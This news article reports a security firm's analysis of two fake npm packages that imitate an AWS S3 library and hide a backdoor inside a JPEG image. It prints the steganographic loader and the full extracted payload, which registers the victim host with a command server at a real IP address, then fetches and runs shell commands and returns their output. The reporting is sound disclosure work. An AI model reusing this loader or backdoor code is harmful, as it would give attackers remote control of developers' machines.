Researchers have determined that two fake AWS packages downloaded hundreds of times from the open source NPM JavaScript repository contained carefully concealed code that backdoored developers’ computers when executed.
The packages, img-aws-s3-object-multipart-copy and legacyaws-s3-object-multipart-copy, were attempts to pass as aws-s3-object-multipart-copy, a legitimate JavaScript library for copying files using Amazon’s S3 cloud service. The fake packages included all the code found in the legitimate library but added a JavaScript file named loadformat.js. That file provided what appeared to be benign code and three JPG images that were processed during package installation. One of those images contained code fragments that, when reconstructed, formed code for backdooring the developer device.
Growing sophistication
“We have reported these packages for removal, however the malicious packages remained available on npm for nearly two days,” researchers from Phylum, the security firm that spotted the packages, wrote. “This is worrying as it implies that most systems are unable to detect and promptly report on these packages, leaving developers vulnerable to attack for longer periods of time.”
In an email, Phylum Head of Research Ross Bryant said img-aws-s3-object-multipart-copy received 134 downloads before it was taken down. The other package, legacyaws-s3-object-multipart-copy, got 48.
The care the package developers put into the code and the effectiveness of their tactics underscore the growing sophistication of attacks targeting open source repositories, which besides NPM have included PyPI, GitHub, and RubyGems. The advances made it possible for the vast majority of malware-scanning products to miss the backdoor sneaked into these two packages. In the past 17 months, threat actors backed by the North Korean government have targeted developers twice, one of those using a zero-day vulnerability.
Phylum researchers provided a deep-dive analysis of how the concealment worked:
Analyzing the loadformat.js file, we find what appears to be some fairly innocuous image analysis code. However, upon closer review, we see that this code is doing a few interesting things, resulting in execution on the victim machine.
After reading the image file from the disk, each byte is analyzed. Any bytes with a value between 32 and 126 are converted from Unicode values into a character and appended to the analyzepixels variable.

function processImage(filePath) {
  console.log("Processing image...");
  const data = fs.readFileSync(filePath);
  let analyzepixels = "";
  let convertertree = false;
  for (let i = 0; i < data.length; i++) {
    const value = data[i];
    if (value >= 32 && value <= 126) {
      analyzepixels += String.fromCharCode(value);
    } else {
      if (analyzepixels.length > 2000) {
        convertertree = true;
        break;
      }
      analyzepixels = "";
    }
  }
  // ...
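The byte scan described above can be turned around for defensive use. The following is a minimal sketch, not Phylum's tooling: `longestPrintableRun` is a hypothetical helper that reports the longest run of bytes in the 32 to 126 range, and the sample buffer is invented for illustration. Unlike the malicious loop, it does not stop at the first run that exceeds 2,000 characters; it simply returns the longest run so an analyst can inspect it.

```javascript
// Hypothetical helper: return the longest run of printable ASCII bytes
// (values 32 through 126) found in a buffer.
function longestPrintableRun(data) {
  let best = "";
  let current = "";
  for (const value of data) {
    if (value >= 32 && value <= 126) {
      current += String.fromCharCode(value);
      if (current.length > best.length) best = current;
    } else {
      // A non-printable byte ends the current run.
      current = "";
    }
  }
  return best;
}

// Illustrative input only: a few binary bytes surrounding a short text run.
const sample = Buffer.concat([
  Buffer.from([0xff, 0xd8, 0xff, 0xe0]),
  Buffer.from("console.log('hidden')", "ascii"),
  Buffer.from([0x00, 0x01]),
]);

const run = longestPrintableRun(sample);
console.log(run.length, run);
```

An image whose longest printable run is thousands of characters long is unusual enough to deserve a closer look, although the right threshold for a scanner is a judgment call.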
The threat actor then defines two distinct bodies of a function and stores each in their own variables, imagebyte and analyzePixels.

let analyzePixеls = `
  if (false) {
    exec("node -v", (error, stdout, stderr) => {
      console.log(stdout);
    });
  }
  console.log("check nodejs version...");
`;

let imagebyte = `
  const httpsOptions = {
    hostname: 'cloudconvert.com',
    path: '/image-converter',
    method: 'POST'
  };
  const req = https.request(httpsOptions, res => {
    console.log('Status Code:', res.statusCode);
  });
  req.on('error', error => {
    console.error(error);
  });
  req.end();
  console.log("Executing operation...");
`;
If convertertree is set to true, imagebyte is set to analyzepixels. In plain language, if convertertree is set, it will execute whatever is contained in the script we extracted from the image file.

if (convertertree) {
  console.log("Optimization complete. Applying advanced features...");
  imagebyte = analyzepixels;
} else {
  console.log("Optimization complete. No advanced features applied.");
}
Looking back above, we note that convertertree will be set to true if the length of the bytes found in the image is greater than 2,000.

if (analyzepixels.length > 2000) {
  convertertree = true;
  break;
}
The author then creates a new function using either code that sends an empty POST request to cloudconvert.com or initiates executing whatever was extracted from the image files.

const func = new Function('https', 'exec', 'os', imagebyte);
func(https, exec, os);
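To illustrate why swapping the string matters, here is a harmless sketch of the Function constructor pattern. The names `decoyBody`, `extractedBody`, `fakeOs`, and `runBody` are hypothetical stand-ins, and nothing here touches the network or the shell. The constructor compiles whatever string it is given, and the compiled function sees only the objects passed in as arguments.

```javascript
// Two string bodies, mirroring the decoy/payload swap with harmless stand-ins.
const decoyBody = 'return "decoy: " + os.platformName;';
const extractedBody = 'return "extracted: " + os.platformName;';

// Hypothetical stand-in for the real `os` module so the sketch has no side effects.
const fakeOs = { platformName: "example-os" };

function runBody(body) {
  // new Function(paramName, body) compiles the string into a function
  // whose single parameter is named `os`.
  const func = new Function("os", body);
  return func(fakeOs);
}

console.log(runBody(decoyBody));     // decoy: example-os
console.log(runBody(extractedBody)); // extracted: example-os
```

Because the body is only a string until the constructor runs, a scanner that reads the source file sees the decoy text and never the code that is actually compiled.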
The lingering question is, what is contained in the images that this is trying to execute?
Command-and-Control in a JPEG
Looking at the bottom of the loadformat.js file, we see the following:

processImage('logo1.jpg');
processImage('logo2.jpg');
processImage('logo3.jpg');
We find these three files in the package’s root, which are included below without modification, unless otherwise noted.
If we run each of these through the processImage(...) function from above, we find that the Intel image (i.e., logo1.jpg) does not contain enough “valid” bytes to set the convertertree variable to true. The same goes for logo3.jpg, the AMD logo. However, for the Microsoft logo (logo2.jpg), we find the following, formatted for readability:

let fetchInterval = 0x1388;
let intervalId = setInterval(fetchAndExecuteCommand, fetchInterval);
const clientInfo = {
  'name': os.hostname(),
  'os': os.type() + " " + os.release()
};
const agent = new https.Agent({ 'rejectUnauthorized': false });

function registerClient() {
  const _0x47c6de = JSON.stringify(clientInfo);
  const _0x5a10c1 = {
    'hostname': "85.208.108.29",
    'port': 0x1bb,
    'path': "/register",
    'method': "POST",
    'headers': {
      'Content-Type': "application/json",
      'Content-Length': Buffer.byteLength(_0x47c6de)
    },
    'agent': agent
  };
  const _0x38f695 = https.request(_0x5a10c1, _0x454719 => {
    console.log("Registered with server as " + clientInfo.name);
  });
  _0x38f695.on("error", _0x1159ec => {
    console.error("Problem with registration: " + _0x1159ec.message);
  });
  _0x38f695.write(_0x47c6de);
  _0x38f695.end();
}

function fetchAndExecuteCommand() {
  const _0x2dae30 = {
    'hostname': "85.208.108.29",
    'port': 0x1bb,
    'path': "/get-command?clientId=" + encodeURIComponent(clientInfo.name),
    'method': "GET",
    'agent': agent
  };
  https.get(_0x2dae30, _0x4a0c09 => {
    let _0x41cd12 = '';
    _0x4a0c09.on("data", _0x5cbbc5 => {
      _0x41cd12 += _0x5cbbc5.toString();
    });
    _0x4a0c09.on("end", () => {
      console.log("Received command:", _0x41cd12);
      if (_0x41cd12.startsWith('setInterval:')) {
        const _0x1e3896 = parseInt(_0x41cd12.split(':')[0x1], 0xa);
        if (!isNaN(_0x1e3896) && _0x1e3896 > 0x0) {
          clearInterval(intervalId);
          fetchInterval = _0x1e3896 * 0x3e8;
          intervalId = setInterval(fetchAndExecuteCommand, fetchInterval);
          console.log("Interval has been updated to " + _0x1e3896 + " seconds.");
        } else {
          console.log("Invalid interval command received.");
        }
      } else {
        if (_0x41cd12.startsWith("cd ")) {
          const _0x58bd7d = _0x41cd12.substring(0x3).trim();
          try {
            process.chdir(_0x58bd7d);
            console.log("Changed directory to " + process.cwd());
          } catch (_0x2ee272) {
            console.error("Change directory failed: " + _0x2ee272);
          }
        } else if (_0x41cd12 !== "No commands") {
          exec(_0x41cd12, { 'cwd': process.cwd() }, (_0x5da676, _0x1ae10c, _0x46788b) => {
            let _0x4a96cd = _0x1ae10c;
            if (_0x5da676) {
              console.error("exec error: " + _0x5da676);
              _0x4a96cd += "\nError: " + _0x46788b;
            }
            postResult(_0x4a96cd);
          });
        } else {
          console.log("No commands to execute");
        }
      }
    });
  }).on("error", _0x2e8190 => {
    console.error("Got error: " + _0x2e8190.message);
  });
}

function postResult(_0x1d73c1) {
  const _0xc05626 = {
    'hostname': "85.208.108.29",
    'port': 0x1bb,
    'path': "/post-result?clientId=" + encodeURIComponent(clientInfo.name),
    'method': "POST",
    'headers': {
      'Content-Type': "text/plain",
      'Content-Length': Buffer.byteLength(_0x1d73c1)
    },
    'agent': agent
  };
  const _0x2fcb05 = https.request(_0xc05626, _0x448ba6 => {
    console.log("Result sent to the server");
  });
  _0x2fcb05.on('error', _0x1f60a7 => {
    console.error("Problem with request: " + _0x1f60a7.message);
  });
  _0x2fcb05.write(_0x1d73c1);
  _0x2fcb05.end();
}

registerClient();
This code first registers the new client with the remote C2 by sending the following clientInfo to 85.208.108.29.

const clientInfo = {
  'name': os.hostname(),
  'os': os.type() + " " + os.release()
};

It then sets up an interval that fetches commands from the attacker every 5 seconds.

let fetchInterval = 0x1388;
let intervalId = setInterval(fetchAndExecuteCommand, fetchInterval);
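The extracted script writes its numeric constants in hexadecimal, which makes values such as the polling interval harder to read at a glance. As a small reading aid, this sketch decodes the literals that appear in the script. The variable names are descriptive labels chosen here and do not appear in the original code.

```javascript
// Hex literals from the extracted script, decoded to decimal.
const fetchIntervalMs = 0x1388; // initial polling interval, in milliseconds
const port = 0x1bb;             // port used for every request
const msPerSecond = 0x3e8;      // multiplier applied to a "setInterval:" value
const radix = 0xa;              // radix passed to parseInt

console.log(fetchIntervalMs, port, msPerSecond, radix); // 5000 443 1000 10
console.log(fetchIntervalMs / msPerSecond);             // 5
```

The 5,000-millisecond interval matches the 5-second polling described above, and port 443 is the standard HTTPS port.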
Received commands are executed on the device, and the output is sent back to the attacker on the endpoint /post-result?clientId=<targetClientInfoName>.
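For analysts reading captured traffic, the branching in the extracted script can be summarized as a small classifier. This is a sketch under stated assumptions: `classifyCommand` and the labels it returns are hypothetical names introduced here, and the function only describes what the script would do with a given response. It executes nothing.

```javascript
// Hypothetical analyst helper: classify a C2 response the way the extracted
// script branches on it, without executing anything.
function classifyCommand(command) {
  if (command.startsWith("setInterval:")) {
    // The script multiplies a positive integer number of seconds by 1000.
    const seconds = parseInt(command.split(":")[1], 10);
    return !isNaN(seconds) && seconds > 0
      ? { kind: "set-interval", intervalMs: seconds * 1000 }
      : { kind: "invalid-interval" };
  }
  if (command.startsWith("cd ")) {
    return { kind: "change-directory", target: command.substring(3).trim() };
  }
  if (command === "No commands") {
    return { kind: "idle" };
  }
  // Anything else is passed to exec() by the script.
  return { kind: "shell-exec", commandLine: command };
}

console.log(classifyCommand("setInterval:30"));
console.log(classifyCommand("cd /tmp"));
console.log(classifyCommand("No commands"));
console.log(classifyCommand("whoami"));
```

The final branch is the important one: any response that is not an interval change, a directory change, or the idle marker runs as a shell command.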
One of the most innovative methods in recent memory for concealing an open source backdoor was discovered in March, just weeks before it was to be included in a production release of XZ Utils, a data-compression utility available on almost all installations of Linux. The backdoor was implemented through a five-stage loader that used a series of simple but clever techniques to hide itself. Once installed, the backdoor allowed the threat actors to log in to infected systems with administrative system rights.
The person or group responsible spent years working on the backdoor. Besides the sophistication of the concealment method, the entity devoted large amounts of time to producing high-quality code for open source projects in a successful effort to build trust with other developers.
In May, Phylum disrupted a separate campaign that backdoored a package available in PyPI that also used steganography, a technique that embeds secret code into images.
“In the last few years, we’ve seen a dramatic rise in the sophistication and volume of malicious packages published to open source ecosystems,” Phylum researchers wrote. “Make no mistake, these attacks are successful. It is absolutely imperative that developers and security organizations alike are keenly aware of this fact and are deeply vigilant with regard to open source libraries they consume.”